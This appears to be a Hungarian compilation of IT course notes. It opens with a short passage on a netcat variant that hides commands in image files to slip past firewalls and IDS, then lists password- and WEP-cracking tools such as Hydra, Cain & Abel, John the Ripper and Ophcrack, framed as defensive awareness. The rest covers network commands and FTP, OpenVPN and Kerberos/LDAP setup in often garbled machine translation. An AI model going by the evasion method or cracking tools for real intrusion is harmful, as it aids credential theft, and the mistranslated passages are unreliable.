Pl. netcat ezen veriója képfájlokat küld ki a netre, illetve fogad. A képek tök átlagosak, bár ha valaki megnézi képek kódját, annak bizonyos bítjeiben értelemes utasítás sorozatot talál, és nem biztos, sőt nagyon nem biztos, hogy a tűzfal, vagy a behatolásellenörző rendszer(IDS) észlelni fog bármit is. Hiszen egy kép mérete biztosan nagyobb mint 64 kilobyte, ekkor hiába nézi az IDS a csomagok valid értékeit nem fogja észrevenni, hogy illegális kommunikáció zajlik, hiszen a több csomagból álló képeket előbb össze is kéne rakni, ez pedig sok memóriát igényelne, tehát az IDS ilyet nem fog csinálni, a tűzfal meg főleg nem, mert nem erre való.

Interneten felelhető veszélyes programok, amikkel támadást indíthatnak ellened 13_A

A rendszerünk védelme érdekében szükséges, hogy ismerjük az ellenség fegyverzetét, hogy hatékonyan védekezhessünk ellene.

Airsnort

Az AirSnort egy vezeték nélküli LAN (WLAN) eszköz, amely a titkosítási kulcsokat repedezi a 802.11b WEP hálózatokon. Az AirSnort az átvitel passzív ellenőrzésével működik, a titkosítási kulcs kiszámításakor, amikor elég számú csomagot gyűjtenek össze.

BFG / hydra

A BFG egy módosított hidraulikus eszköz, amely most támogatja a jelszavak generálását brutális módban, ellentétben az eredeti hidrával. Természetesen teljes forráskódot biztosítunk, és minden olyan rendszernél össze kell fordulnia, ahol a Hydra összeállít, azaz minden UNIX-alapú rendszert, beleértve a Linuxot, a BSD-t, a Mac OS-t, a Windows-ot (cygwin) stb.

Káin és Ábel

A Cain & Abel egy jelszó-helyreállító eszköz a Microsoft operációs rendszerekhez. Lehetővé teszi a különböző jelszavak könnyű helyreállítását a hálózat szipogatásával, a titkosított jelszavak repedezésével Szótár, Brute-Force és Cryptanalysis támadásokkal, VoIP-beszélgetések felvétele, kódolt jelszavak dekódolása, vezeték nélküli hálózati kulcsok visszaállítása, jelszóboxok felfedése, gyorsítótárban lévő jelszavak feltárása és útvonalválasztás elemzése protokollokat. A program nem használ ki semmilyen olyan szoftveres biztonsági rést vagy hibát, amelyet kevés erőfeszítéssel lehetett megoldani. A protokoll szabványok, hitelesítési módszerek és gyorsítótár-mechanizmusok bizonyos biztonsági vonatkozásai / gyengeségei; fő célja a különböző forrásokból származó jelszavak és hitelesítő adatok egyszerősített helyreállítása, de a Microsoft Windows felhasználók számára is tartalmaz néhány "nem szabványos" segédprogramot. A Cain & Abel-t azért fejlesztették ki, hogy hasznos lesz a hálózati rendszergazdáknak, a tanároknak, a biztonsági tanácsadóknak / szakembereknek, a törvényszéki munkatársaknak, a biztonsági szoftvergyártóknak, a professzionális penetrációs teszternek és mindenki másnak, aki etikai okokból azt tervezi. A szerző nem segít vagy támogat semmilyen illegális tevékenységet ezzel a programmal kapcsolatban. Figyelmeztetni kell arra, hogy fennáll annak a lehetősége, hogy a szoftver használatával károkat okozhat és / vagy adatvesztést okozhat, és a szerző semmilyen körülmények között nem vállal felelősséget az ilyen károkért vagy adatvesztésért. Kérjük, figyelmesen olvassa el a programban foglalt licencszerződést, mielőtt használná.

CrackStation

A Crackstation a leghatékonyabb hash repedés szolgáltatás. Mi feltörünk: MD5, SHA1, SHA2, WPA és még sok más ...

John the Ripper

John the Ripper egy gyors jelszó-cracker, amely jelenleg a Unix számos ízének elérhető (11 hivatalosan támogatott, nem számítva a különböző architektúrákat), Windows, DOS, BeOS és OpenVMS. Elsődleges célja a gyenge Unix jelszavak felderítése. A különböző Unix ízekben leggyakrabban megtalálható többféle crypt (3) jelszó hash típusú típusok közül a Kerberos AFS és a Windows NT / 2000 / XP / 2003 LM hash-ok támogatják, valamint több más javítócsomaggal.

L0phtcrack (LC6)

Az L0phtCrack 6 nagy teljesítményű funkciókkal rendelkezik, mint például az ütemezés, a 64 bites Windows-verziók hash-eltávolítása, a többprocesszoros algoritmusok és a hálózatok felügyelete és dekódolása. Mégis a legegyszerűbb a jelszófelügyeleti és helyreállítási szoftverek használata.

MD5 Mass Reverser

a tömeges repedés md5 csak egy kattintással törli el. https://www.virustotal.com/en/file/64d6db9c9646a69955a51c9b1ab27a00841087c32ddfc5a26849992afeb1950e/analysis/1404143100/ követelmény: .NET Framework Internet Connection Szerző: Anon? M ID Greets: Indonesian Fighter Cyber  Md5Decrypter.co.uk Adatbázis Több mint 13 milliárd dekódolt Md5 hashajt. A legnagyobb Md5 adatbázis online. Kripta és dekódolja a hasokat.

Ophcrack

Az Ophcrack egy ingyenes Windows jelszó-cracker, amely szivárvány asztalokon alapul. A módszer feltalálói által elvégzett szivárványtáblák nagyon hatékony végrehajtása. Grafikus felhasználói felületet kapott, és több platformon fut. Jellemzők: * "Windows, Linux / Unix, Mac OS X, ... *" futások LM és NTLM repedések. * »Ingyenes asztalok elérhetőek a Windows XP és Vista rendszerhez. * »Brute-force modul egyszerű jelszavakhoz. * »LiveCD elérhető a repedés egyszerűsítésére. * * A titkosított SAM-ből előállít törmeléket a Windows partícióból, Vista tartalmazza. * »Ingyenes és nyílt forráskódú szoftverek (GPL).

Hálózati parancsok

Az egyik ilyen parancs, amit bizonyára sokan ismernek, az ipconfig. Ha csak így simán, paraméter nélkül beírjuk, akkor rövid választ kapunk, amelyből kiderül, hogy az aktuális hálózati kapcsolatnak mi az IP-címe, mi az alhálózati maszkja és az átjáró IP-címe. Ugyanezt az információt megkaphatjuk úgy is, ha a Start -> Vezérlőpult -> Hálózati kapcsolatok ablakban kétszer kattintunk egy kapcsolatra, majd egyszer a Tulajdonság gombra, a felső listán kiválasztjuk a TCP/IP protokoll listaelemet, és ismét rákattintunk a Tulajdonságok gombra. Vajon melyik az egyszerűbb?


Ha kicsit bővebb információra vágyunk, írjuk be az ipconfig /all parancsot. Ez az összes aktív kapcsolat részletes adatait adja vissza, amihez a Windowsban végig kéne kattintgatni úgy fél napot.


Jó hasznát vehetjük az ipconfignak akkor is, ha DHCP-kiszolgáló oszt IP-címet hálózati kapcsolatunk számára. Az ipconfig /release paranccsal visszaadhatjuk a korábban kapott IP-címet (ezzel tulajdonképpen kikapcsoljuk a TCP/IP kapcsolatot adott hálózati kártyánkon), míg az ipconfig /renew kiadásával újat kérhetünk, vagy megújíthatjuk a korábbit. A DHCP-kiszolgáló működésétől függően vagy egy másik IP-címet kapunk, vagy ugyanazt, amelyik korábban volt (például a UPC chellós internetkapcsolatoknál).


Érdekességképpen kipróbálhatjuk a /displaydns paramétert is: ez azoknak a hálózati címeknek a listáját adja vissza, amelyekkel a közelmúltban kapcsolatba kerültünk. Azért, hogy ne kelljen folyton a DNS-kiszolgálóhoz fordulni a hálózati név IP-címre történő fordításáért, az utolsó néhány cím eltárolódik ebben a pufferben. A puffert a /flushdns paraméterrel üríthetjük ki, illetve a /registerdns-sel kézzel vihetünk bele címeket.


Amennyiben csak a környezetünkben (szűkebb értelemben: a gépünkben) levő hálózati eszközök MAC-címére (a Media Access Control kifejezés rövidítése, a hálózati eszközök egyedi hardverazonosítója, amelynek alapján a hálózati csomag eltalál az adott eszközhöz) vagyunk kíváncsiak, használjuk a getmac parancsot. Érdemes rögtön a /v paraméterrel meghívni, különben a címeken kívül normál halandó számára jobbára értelmezhetetlen krikszkrakszot ad vissza (már ha a MAC-címek 16-os számrendszerbeli számértékeit nem tekintjük annak). A parancs jól használható nagyobb hálózati környezetben, illetve érdekessége, hogy az eredményt nemcsak táblázatos formában, hanem a /fo csv paramétert használva vesszővel elválasztott listán is vissza tudja adni, amely könnyen feldolgozható, például egy táblázatkezelővel. Ehhez persze az eredményt nem árt átirányítani egy állományba, valahogy így (a /nh az oszlopfejlécek kiírását tiltja le): getmac /v /nh /fo csv >maccimek.csv


Valószínűleg mindenki találkozott már az internet kapcsán a ping kifejezéssel. Gyakran alkalmazzák az internetkapcsolat minőségének mérésére. A ping elküld egy speciális hálózati csomagot a paraméterben megadott címre, és méri, hogy mennyi idő telik el azalatt, míg a csomag célhoz ér, és onnan a válasz visszaérkezik a mi gépünkhöz. Nyilván minél kisebb ez az időérték, annál jobb, azaz gyorsabb a kapcsolat. Ha semmilyen más paramétert nem adunk meg, akkor négy ilyen oda-vissza utat mér meg, és ezekből készít egy kis statisztikát. Amennyiben időtúllépési üzenetet kapunk, az azt jelenti, hogy a csomag elveszett útközben. Ez önmagában még nem feltétlenül utal hálózati hibára, ugyanis sok kiszolgáló egyszerűen „eldobja" a pingcsomagokat, hogy csökkentse a terhelést hálózati eszközein.


Leggyakrabban használt paramétere a -n, amellyel azt adjuk meg, hogy hány csomagot küldjön ki, és mérjen meg a ping, valamint a -t, amellyel arra utasítjuk, hogy mindaddig küldözgessen csomagokat, és mérje az időket, amíg le nem állítjuk a + megnyomásával. Például a ping www.pcworld.hu /n 10 tíz csomag idejét méri meg, és ezt követően készít statisztikát. Érdekes lehet még a /w paraméter, amely után megadhatjuk, hogy mennyi idő elteltével tekintse elveszettnek a csomagot. A számot ezred másodpercben kell megadni, az alapérték 4000, tehát 4 másodperc.


Akik használták már a pinget, biztosan ismerik a tracert (hivatalos nevén traceroot) parancsot is, amely a számítógépünk és a paraméterben megadott cím között hálózati eszközök (például útválasztók) címét és a visszatérési időket listázza ki, illetve hiba esetén megmutatja, hol szakad meg a kommunikáció. A kedvenc szerverünkig tartó utat így deríthetjük fel: tracert www.pcworld.hu.


Ez a parancs tulajdonképpen pingcsomagokat küld ki a címzett felé, de korlátozza, hogy a csomag hány útválasztón mehet keresztül. A korlátot egyesével növelgetve „végigpingeli" a teljes útvonalat, így nemcsak a közbülső hálózati eszközök címét tudja meg, de időeredményei is lesznek mindegyik eszközhöz. Alapértelmezés szerint a korlát maximum értéke 30, ha tehát ennél „messzebb" van a megadott cél, akkor a tracert nem tudja visszaadni a teljes útvonalat (ezt egyébként felülbírálhatjuk a -h paraméter után megadott számmal).


Ha statisztikára vágyunk, használjuk inkább a pathping parancsot. A pathping pontosan ugyanazt teszi, mint a tracert, azzal a különbséggel, hogy előbb megállapítja a gépünk és a megadott hálózati cím közti eszközök címét, majd ezeket 150 másodpercen keresztül pingeli, és ebből készít statisztikát. Ennek eredményét is érdemes inkább egy szövegállományba átirányítani, hogy utána könnyebben értelmezhető, feldolgozható legyen.


Végül a netstat kiváló biztonsági eszközként megmutatja, hogy számítógépünk milyen portokon (kommunikációs kapukon) keresztül milyen más gépekkel vagy hálózati eszközökkel áll kapcsolatban. Számos paraméterével a legkülönbözőbb információkat csikarhatjuk ki belőle. Érdemes először a netstat /a /o változattal próbálkozni. Az eredményül kapott listából kiderülnek a jelenlegi TCP és UDP kapcsolatok adatai, illetve az, hogy gépünk milyen portokon „figyeli" a hálózatot vagy az internetet, azaz, hol lehet hozzá kapcsolódni. A /o paraméter egy külön PID-oszloppal egészíti ki az eredménytáblát; ez a gépünkön futó azon programok vagy folyamatok azonosítója, amelyek korábban kommunikáltak a külvilággal, vagy csak várják a lehetőséget. A PID alapján azonosíthatjuk ezeket a programokat a Feladatkezelővel is, de ha már a Parancssorban vagyunk, használjuk inkább a tasklist parancsot ezek listázására (és a taskkillt a kilövésükre).


Visszatérve a netstatra, a /s paraméterrel igazi összefoglalót kérhetünk az eddig kommunikációk számszerű eredményéről, bár az egyes adatok valószínűleg inkább a hálózat és az internet működésében jártas szakemberek számára lesz érdekes. Ők okvetlenül ismerkedjenek meg a többi paraméter jelentésével is!

https://www.youtube.com/watch?v=AimCNTzDlVo


Hálózati protokollok

Kérelem

BitTorrent DHCP DNS FTP HTTP IMAP IRC NNTP POP3 RTP SIP SMTP SNMP SSH HTTP Telnet TLS SSL TFTP

szállítás

DCCP · SCTP · TCP · UDP · IL · RUDP

hálózatba

ARP · BGP · ICMP · IGMP · IP ( IPv4 · IPv6 ) · RIP

link

ATM · Ethernet · FDDI · ISDN · IS-IS · MPLS · Token Ring · PPP · SLIP · Wi-Fi

fizikailag

IEEE 802 · ISDN · RS-232 · IrDA · Bluetooth · xDSL

Az ARP-t négy esetben használják, amikor a csomópontok kommunikálni akarnak:

Amikor a csomópontok ugyanabban a hálózatban vannak, és kommunikálni akarnak egymással
Ha a csomópontok különböző hálózatokban vannak, és routeret kell használnia a fogadó csomópont eléréséhez
Amikor egy útválasztónak egy csomagot kell továbbítania egy csomópontnak egy másik útválasztón keresztül
Ha egy útválasztónak egy csomagot kell továbbítania egy csomópontról egy másikra ugyanazon a hálózaton
Az ARP , Address Resolution Protocol , olyan kommunikációs protokoll, amelyet egy IP-cím MAC-címhez való hozzárendelésére használnak. Az ARP általában hálózati protokollnak számít, és az OSI modellben a hálózat és a kapcsolat tárolása közötti kapcsolat.

A hálózati adapter, például az Ethernet , olyan 2. szintű eszköz, amely képes kereteket küldeni egyik csomópontról a másikra. Minden csomópont címezhető a MAC címeken keresztül. Így a csomóponttól a csomópontig történő fizikai jelzés e MAC-címekből származik, míg az IP-címeket használó alkalmazások. Ahhoz, hogy ez megtörténjen, a csomópontnak ezután társítania kell a címzett IP címét a címzett MAC-címével.



Az ARP kérelem (ARP kérés) alapvetően megkérdezi, hogy "Ki rendelkezik IP-címmel xxxx" és egy 2. szintű adás, amelynek a saját csomópont MAC-címét a feladó címe. Az IP címmel rendelkező xxxx csomópont unicast visszaad.

A tcpdump programmal regisztrált ARP forgalom így néz ki:

  [root @ teacher ~] # tcpdump -ennqti eth0 \ (arp vagy icmp \)
 tcpdump: verbose kimenet elnyomva használja a -v vagy -vv-t a teljes protokoll dekódolásához
 hallgatva az eth0-on, az EN10MB (Ethernet) kapcsolattípussal, a rögzítési méret 96 bájt
 00: 19: 5b: 4c: 2c: 5A> ff: ff: ff: ff: ff: ff, ARP, hossza 60: arp, aki 192.168.10.179 (ff: ff: ff: ff: ff: ff) 192.168.10.1
 00: 14: 22: 52: 6b: 03> 00: 19: 5b: 4c: 2c: 5A, ARP, hossza 42: arp válasz 192.168.10.179 00: 14: 22: 52: 6b: 03
 00: 14: 22: 52: 6b: 03> ff: ff: ff: ff: ff: ff, ARP, hossza 42: arp who-had 192.168.10.31 tell 192.168.10.179
 00: 40: 8c: 55: 70: 9c> 00: 14: 22: 52: 6b: 03, ARP, 60 hossza: arp válasz 192.168.10.31 00: 40: 8c: 55: 70: 9c
Először is a 192.168.10.1-es IP-címmel érkező értékek ("who-has") a ff: ff: ff: ff: ff: ff: ff: A műsorszóró domain összes csomópontja észleli. A számítógépet, amelyen a naplózás megtörtént, kérték, és ezért válaszol (válasz). Minden más számítógép figyelmen kívül hagyja ezt a kérelmet.


A második példa az, hogy a naplózó számítógép az ip 192.168.10.31-nek megfelelő MAC-cím után lekérdezést küld, és a 00: 40: 8c: 55: 70: 9c MAC címmel fogadja a csomópont válaszát.



Annak érdekében, hogy ne küldjön ARP-kérést minden csomagról, az operációs rendszer elmenti az eredményt egy táblázatban. Számos operációs rendszer esetén az arp parancs az arp gyorsítótár megtekintésére és manipulálására használható. Például az arp -a cache és az arp-d lista törli a gyorsítótárat.

  [root @ teacher ~] # arp -a
 gw (192.168.10.1) a 00:19: 5B: 4C: 2C: 5A [éter]
 szerver (192.168.10.11) 00: 30: 05: C7: D4: 04 [éter] az eth0
 ?  (192.168.10.31), 00: 40: 8C: 55: 70: 9C / éter / etanolon
Távolítsa el a gw értékeket a táblázatból:

  [root @ teacher ~] # arp -d gw
Új tábla:


  [root @ teacher ~] # arp -a
 gw (192.168.10.1) a <incomplete> az eth0-ban
 szerver (192.168.10.11) 00: 30: 05: C7: D4: 04 [éter] az eth0
 ?  (192.168.10.31), 00: 40: 8C: 55: 70: 9C / éter / etanolon


Windows 2016 sterver szolgáltatásainak beállításai

Oktatóvideók
https://www.youtube.com/watch?v=Qlz0vrobKfA
https://www.youtube.com/watch?v=NE2nQlYcwao
https://www.youtube.com/watch?v=Qlz0vrobKfA&t=619s
https://www.youtube.com/watch?v=wGZrhKhj0Fk

DNS szerver, új zóna létrehozása,
AD DC új erdő létrehozása, Netbios beállítása,
DNS új PTR record létrehozása
DHCP szerver telepítés, beállítás  NEW Scope létrehozása, Ipcím tartomány, alhálózati maszk, GAteWay beállítása, IP tartomány beállítása,
Belépünk a cliensgépbe eldobjuk az ip címet és kérünk egy DHCP ip címet a szervertől.
Vissza a szerverre és a WDS szerver konfigurálása, majd  DNS DHCP van még szükségünk
ADDS az ADS (Automatic Deployment Services) szerver a kiszolgáló feltelepítése, amelyen az összes ADS szolgáltatást futtatja, beleértve a Controller szolgáltatást is.
WDS szerver konfigurálása, Telepítő IMG file hozzáadása. All start
Hyper-V, Felhasználók, gépek beléptetése a tartományba,

FTP-kiszolgáló linux alatt


A fájlátviteli protokoll (FTP) egy TCP protokoll fájlok számítógépek közti fel- és letöltésére. Az FTP kliens/szerver modell alapján működik. A kiszolgáló összetevőt FTP démonnak hívják. Folyamatosan figyeli a távoli kliensek FTP-kéréseit. Kérés fogadásakor kezeli a bejelentkezést, és létrehozza a kapcsolatot. A munkamenet időtartama alatt végrehajtja az FTP kliens által küldött parancsokat.

Az FTP-kiszolgáló elérése kétféleképp kezelhető:

Névtelenül

Hitelesítve

Névtelen módban a távoli kliensek az „anonymous” vagy „ftp” nevű alapértelmezett felhasználói fiók használatával, és jelszóként egy e-mail cím küldésével érhetik el az FTP-kiszolgálót. Hitelesített módban a felhasználónak rendelkeznie kell fiókkal és jelszóval. Az FTP kiszolgáló könyvtárainak és fájljainak elérése a bejelentkezéshez használt fiók jogosultságaitól függ. Általánosságban az FTP-démon elrejti az FTP-kiszolgáló gyökérkönyvtárát, és az FTP home könyvtárára változtatja. Ez elrejti a fájlrendszer többi részét a távoli munkamenetek elől.

vsftpd – FTP-kiszolgáló telepítése
A vsftpd az Ubuntuban elérhető egyik FTP-démon. Egyszerű telepíteni, beállítani és karbantartani. A vsftpd telepítéséhez adja ki a következő parancsot:

sudo apt-get install vsftpd
Névtelen FTP beállítása
By default vsftpd is not configured to only allow anonymous download. If you wish to enable anonymous download edit /etc/vsftpd.conf changing:

anonymous_enable=Yes
During installation a ftp user is created with a home directory of /srv/ftp. This is the default FTP directory.

If you wish to change this location, to /srv/files/ftp for example, simply create a directory in another location and change the ftp user's home directory:

sudo mkdir /srv/files/ftp
sudo usermod -d /srv/files/ftp ftp
A módosítás után indítsa újra a vsftpd démont:

sudo restart vsftpd
Finally, copy any files and directories you would like to make available through anonymous FTP to /srv/files/ftp, or /srv/ftp if you wish to use the default.

Felhasználókat hitelesítő FTP konfigurálása
By default vsftpd is configured to authenticate system users and allow them to download files. If you want users to be able to upload files, edit /etc/vsftpd.conf:

write_enable=YES
Indítsa újra a vsftpd démont:

sudo restart vsftpd
Miután a rendszer felhasználói bejelentkeznek az FTP-re, a saját könyvtáraikba fognak belépni, és onnan tölthetnek le illetve fel, hozhatnak létre könyvtárakat stb.

Ehhez hasonlóan alapértelmezésben a névtelen felhasználók nem tölthetnek fel fájlokat az FTP-kiszolgálóra. Ezen beállítás módosításához vegye ki a következő sort megjegyzésből, és indítsa újra a vsftpd démont:

anon_upload_enable=YES

FTP biztonságossá tétele
Az /etc/vsftpd.conf tartalmaz a vsftpd biztonságosabbá tételét segítő beállításokat is. A felhasználók például saját könyvtárukra korlátozhatók a következő kivételével a megjegyzésből:

chroot_local_user=YES
Korlátozhatja felhasználók adott csoportját is a saját könyvtárukra:

chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
A fenti beállítások megjegyzésből való kivétele után hozzon létre egy /etc/vsftpd.chroot_list nevű fájlt, amely tartalmazza a felhasználók listáját, soronként egy felhasználót. Ezután indítsa újra a vsftpd démont:

sudo restart vsftpd
Az /etc/ftpusers fájl azon felhasználók listáját tartalmazza, akiknek nem engedélyezett az FTP elérése. Az alapértelmezett lista a root, daemon, nobody stb. felhasználókat tartalmazza. További felhasználók FTP-használatának megtiltásához egyszerűen vegye fel őket erre a listára.

Az FTP titkosítható is az FTPS segítségével. Az FTPS az SSL fölötti FTP rövidítése és nem azonos az SFTP-vel. Az SFTP egy FTP-szerű munkamenet titkosított SSH kapcsolat fölött. A fő különbség, hogy az SFTP felhasználóknak szükségük van egy parancsértelmező fiókra a rendszeren, és nem a nologin parancsértelmezőt használják. Nem biztos, hogy egyes környezetekben – például közös webkiszolgálók esetén – ideális minden felhasználónak parancsértelmezőt adni.

Az FTPS beállításához szerkessze az /etc/vsftpd.conf fájlt, és vegye fel a végére a következőt:

ssl_enable=Yes
Vegye észre a tanúsítvánnyal és kulccsal kapcsolatos beállításokat is:

rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
Ezek a beállítások alapértelmezésben az ssl-cert csomag által biztosított tanúsítványra és kulcsra vannak állítva. Éles környezetben ezeket az adott géphez generált tanúsítvánnyal és kulccsal kell helyettesíteni. A tanúsítványokkal kapcsolatos további információkért lásd a „Tanúsítványok” szakaszt.

Most indítsa újra a vsftpd démont, és a nem névtelen felhasználók az FTPS használatára lesznek kényszerítve:

sudo restart vsftpd
Ahhoz, hogy a /usr/sbin/nologin parancsértelmezővel rendelkező felhasználók elérhessék az FTP-t, szerkessze az /etc/shells fájlt, és vegye fel a nologin parancsértelmezőt:

# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
/usr/sbin/nologin
Erre azért van szükség, mert a vsftpd alapértelmezésben a PAM-ot használja hitelesítésre, és az /etc/pam.d/vsftpd konfigurációs fájl tartalmazza a következőt:

auth    required        pam_shells.so
A shells PAM modul korlátozza a parancsértelmezők elérését az /etc/shells fájlban felsoroltakra.

A legtöbb népszerű FTP-kliens beállítható az FTPS használatával történő csatlakozásra. Az lftp parancssori FTP-kliens is képes az FTPS használatára.

OpenVPN linux alatt


Az OpenVPN a nyilvános kulcsinfrastruktúrát (PKI) használja a VPN-forgalom csomópontok közti titkosítására. Az OpenVPN-t használó VPN beüzemelésére egyszerű megoldást ad a klienseknek a VPN-kiszolgáló híd csatolóján keresztüli összekapcsolása. Ez a leírás feltételezi, hogy egy VPN-csomópont, ebben az esetben a kiszolgáló, rendelkezik beállított híd csatolóval. A híd beállításával kapcsolatban lásd a „Híd” szakaszt.

Telepítés
Az openvpn csomag telepítéséhez adja ki a következő parancsot:

sudo apt-get install openvpn
Kiszolgálótanúsítványok
Az openvpn csomag telepítése után létre kell hozni a VPN kiszolgáló tanúsítványait.

Első lépésként másolja az easy-rsa könyvtárat az /etc/openvpn alá. Ez biztosítja, hogy a parancsfájlok módosításai a csomag frissítésekor sem vesznek el. Szüksége lesz az easy-rsa könyvtár jogosultságainak módosítására is a fájlok létrehozásának engedélyezéséhez az aktuális felhasználónak. Adja ki a következő parancsot:

sudo mkdir /etc/openvpn/easy-rsa/
sudo cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/easy-rsa/
sudo chown -R $USER /etc/openvpn/easy-rsa/
Ezután szerkessze az /etc/openvpn/easy-rsa/vars fájlt, igazítsa az alábbiakat a környezetéhez:

export KEY_COUNTRY="HU"
export KEY_PROVINCE="Budapest"
export KEY_CITY="Budapest"
export KEY_ORG="Példacég"
export KEY_EMAIL="geza@példa.hu"
A kiszolgáló tanúsítványának létrehozásához adja ki a következő parancsot:

cd /etc/openvpn/easy-rsa/
source vars
./clean-all
./build-dh
./pkitool --initca
./pkitool --server server
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/
Klienstanúsítványok
A VPN-kliensnek is szüksége lesz tanúsítványra a kiszolgáló felé történő hitelesítéshez. A tanúsítvány létrehozásához adja ki a következő parancsot:

cd /etc/openvpn/easy-rsa/
source vars
./pkitool gépnév

Beállítás
A kiszolgáló beállítása
Ezután állítsa be az openvpn kiszolgálót az /etc/openvpn/server.conf létrehozásával a példafájlból. Adja ki a következő parancsot:

sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/
sudo gzip -d /etc/openvpn/server.conf.gz
Szerkessze az /etc/openvpn/server.conf fájlt, és módosítsa a beállításokat az alábbiak szerint:

local 172.18.100.101
dev tap0
up "/etc/openvpn/up.sh br0"
down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 172.18.100.101 255.255.255.0 172.18.100.105 172.18.100.200
push "route 172.18.100.1 255.255.255.0"
push "dhcp-option DNS 172.18.100.20"
push "dhcp-option DOMAIN példa.hu"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
local: a híd csatoló IP-címe.

server-bridge: akkor szükséges, ha a rendszer hidat használ. A 172.18.100.101 255.255.255.0 rész a híd csatolót és a maszkot jelenti. A 172.18.100.105 172.18.100.200 IP-címtartomány a kliensekhez rendelendő IP-címek tartománya.

push: a kliensek hálózatkezelési beállításai.

user és group: adja meg, hogy az openvpn démon mely felhasználó és csoport nevében fut


Kerberos protokoll

Kerberos (/ kɛərbərəs /) egy számítógépes hálózati hitelesítési protokoll, amely egy nem biztonságos hálózaton keresztül teszi lehetővé a csomópontok közötti kommunikációt, hogy biztonságos módon igazolják személyazonosságukat egymás felé.
Tervezőinek elsődleges célja egy kliens-szerver modell volt, amely kölcsönös hitelesítést nyújt mind a kliens, mind a szerver számára, hogy egymás személyazonosságát megállapíthassák. A Kerberos protokoll üzenetei védve vannak a lehallgatások és az ismétlődő támadások ellen (replay attacks). A Kerberos a szimmetrikus kulcsú titkosításon alapszik, amelyhez egy „megbízható harmadik fél” szükséges: opcionálisan, a hitelesítés egyes fázisaiban - az aszimmetrikus kulcsú titkosítást felhasználva - publikus kulcsú titkosítást is választhatunk. A Kerberos a Massachusetts Institute of Technology (MIT) által kiadott és alkalmazott protokoll, amely egy ingyenes szoftvercsomag is egyben. A Kerberos alapértelmezettként a 88-as portot használja.
Kerberos sch en1.png

A Kerberos résztvevő-adatbázis replikálása két kiszolgáló között bonyolult lehet, és egy újabb felhasználó-adatbázist ad a hálózatához. Szerencsére a MIT Kerberos beállítható LDAP címtár használatára résztvevő-adatbázisként. Ez a szakasz bemutatja az elsődleges és másodlagos Kerberos kiszolgáló beállítását OpenLDAP használatára résztvevő-adatbázisként.

OpenLDAP beállítása
Első lépésként a szükséges sémát kell betölteni egy OpenLDAP kiszolgálóra, amely rendelkezik hálózati kapcsolattal az elsődleges és másodlagos KDC-khez. A szakasz további része feltételezi, hogy az LDAP replikáció is be van állítva legalább két kiszolgáló között. Az OpenLDAP beállításával kapcsolatos információkért lásd: „OpenLDAP kiszolgáló”.

Szükség van még az OpenLDAP beállítására TLS és SSL kapcsolatokhoz, a KDC és az LDAP-kiszolgáló közötti forgalom titkosításához. A részletekért lásd: „TLS és SSL”.

A séma LDAP-ba töltéséhez az LDAP-kiszolgálón telepítse a krb5-kdc-ldap csomagot. Adja ki a következő parancsot:

sudo apt-get install krb5-kdc-ldap
Ezután bontsa ki a kerberos.schema.gz fájlt:

sudo gzip -d /usr/share/doc/krb5-kdc-ldap/kerberos.schema.gz
sudo cp /usr/share/doc/krb5-kdc-ldap/kerberos.schema /etc/ldap/schema/
A kerberos sémát fel kell venni a cn=config fába. Az új séma slapd-be való felvételének módját a „További beállítások” szakasz ismerteti.

Első lépésként hozzon létre egy schema_convert.conf vagy hasonló beszédes nevű konfigurációs fájlt, a következő tartalommal:

include /etc/ldap/schema/core.schema
include /etc/ldap/schema/collective.schema
include /etc/ldap/schema/corba.schema
include /etc/ldap/schema/cosine.schema
include /etc/ldap/schema/duaconf.schema
include /etc/ldap/schema/dyngroup.schema
include /etc/ldap/schema/inetorgperson.schema
include /etc/ldap/schema/java.schema
include /etc/ldap/schema/misc.schema
include /etc/ldap/schema/nis.schema
include /etc/ldap/schema/openldap.schema
include /etc/ldap/schema/ppolicy.schema
include /etc/ldap/schema/kerberos.schema
Hozzon létre egy ideiglenes könyvtárat az LDIF-fájlok tárolásához:

mkdir /tmp/ldif_output
Most az slapcat használatával konvertálja a sémafájlokat:

slapcat -f schema_convert.conf -F /tmp/ldif_output -n0 -s "cn={12}kerberos,cn=schema,cn=config" > /tmp/cn=kerberos.ldif
Módosítsa a fenti fájl- és útvonalneveket a sajátjainak megfelelően.

Szerkessze a kapott /tmp/cn\=kerberos.ldif fájlt, és módosítsa a következő attribútumokat:

dn: cn=kerberos,cn=schema,cn=config
...
cn: kerberos
Távolítsa el a következő sorokat a fájl végéről:

structuralObjectClass: olcSchemaConfig
entryUUID: 18ccd010-746b-102d-9fbe-3760cca765dc
creatorsName: cn=config
createTimestamp: 20090111203515Z
entryCSN: 20090111203515.326445Z#000000#000#000000
modifiersName: cn=config
modifyTimestamp: 20090111203515Z
[Megjegyzés]
Az attribútumértékek eltérők lesznek, győződjön meg róla, hogy eltávolította az attribútumokat.

Töltse be az új sémát az ldapadd használatával:

ldapadd -x -D cn=admin,cn=config -W -f /tmp/cn\=kerberos.ldif
Vegyen fel indexet a krb5principalname attribútumhoz:

ldapmodify -x -D cn=admin,cn=config -W
Enter LDAP Password:
dn: olcDatabase={1}hdb,cn=config
add: olcDbIndex
olcDbIndex: krbPrincipalName eq,pres,sub

modifying entry "olcDatabase={1}hdb,cn=config"
Végül frissítse a hozzáférés-vezérlési listákat (ACL):

ldapmodify -x -D cn=admin,cn=config -W
Enter LDAP Password: 
dn: olcDatabase={1}hdb,cn=config
replace: olcAccess
olcAccess: to attrs=userPassword,shadowLastChange,krbPrincipalKey by dn="cn=admin,dc=példa
,dc=hu" write by anonymous auth by self write by * none
-
add: olcAccess
olcAccess: to dn.base="" by * read
-
add: olcAccess
olcAccess: to * by dn="cn=admin,dc=példa,dc=hu" write by * read

modifying entry "olcDatabase={1}hdb,cn=config"

Ennyi az egész, az LDAP-címtár ezzel készen áll a Kerberos résztvevő-adatbázisként való használatra

